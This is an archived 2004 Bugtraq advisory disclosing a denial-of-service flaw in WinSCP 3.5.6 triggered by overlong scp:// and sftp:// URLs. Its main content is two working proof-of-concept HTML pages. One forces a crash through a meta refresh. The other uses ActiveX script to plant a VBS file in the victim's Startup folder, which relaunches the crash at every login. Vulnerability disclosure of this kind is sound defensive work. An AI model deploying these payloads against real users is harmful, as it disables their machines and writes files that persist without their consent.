WinSCP Denial of Service

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WinSCP Denial of Service
From: Luca Ercoli <luca.e@xxxxxxxxxx>
Date: 15 Apr 2004 06:17:04 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Package:       WinSCP
Auth:          http://winscp.sourceforge.net
Version(s):    3.5.6 (maybe also prior versions are vulnerable)
Vulnerability: Denial of Service




What?s WinSCP:

?WinSCP is an open source SFTP (SSH File Transfer Protocol) and
SCP (Secure CoPy) client for Windows using SSH (Secure SHell).
Its main function is safe copying of files between a local and
a remote computer.? 



Vulnerability Description:

A default installation of WinSCP provide the user with 
functionality to handle sftp:// and scp:// addresses. 
The vulnerability exists due to the way the application 
handles long URL?s. A malformed scp:// or sftp:// address 
embedded in a HTML tag cause the WinSCP application to 
exhaust CPU and Memory resources.
The attacker would need the ability to convince the user
to visiting a web site he controlled or opening an HTML 
e-mail he had prepared. During the denial of service, 
WinSCP will not display any GUI.



Goal:

An attacker may use this flaw to prevent the users of attacked
host from working properly.



Pratical Examples:

------ WinSCP_DoS1.html  --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>
<BODY>
</BODY>
</HTML>

----------------------------------


-------- WinSCP_DoS2.html  -------

<html>
  <head>
  <title>WinSCP DoS</title>
   
    &lt;script language="JScript">

     var WshShell = new ActiveXObject("WScript.Shell");
     strSU = WshShell.SpecialFolders("StartUp");
 
     var fso = new ActiveXObject("Scripting.FileSystemObject");
     var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);
      
     vibas.WriteLine("Dim shell");
     vibas.WriteLine("Dim quote");
     vibas.WriteLine("Dim DoS");
     vibas.WriteLine("Dim param");
     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
     vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
     vibas.WriteLine("quote = Chr(34)");
     vibas.WriteLine("pgm = \"explorer\"");
     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");
         
     vibas.Close();
     
    &lt;/script&gt;

  </head>
</html>

----------------------------------






Credits:
-- 

Luca Ercoli     <luca.e [at] seeweb.com>
Seeweb          http://www.seeweb.com

Prev by Date: [cliph@xxxxxxx: Linux kernel setsockopt MCAST_MSFILTER integer overflow]
Next by Date: Cisco Security Advisory: Vulnerabilities in SNMP Message Processing
Previous by thread: [cliph@xxxxxxx: Linux kernel setsockopt MCAST_MSFILTER integer overflow]
Next by thread: Cisco Security Advisory: Vulnerabilities in SNMP Message Processing
Index(es):
- Date
- Thread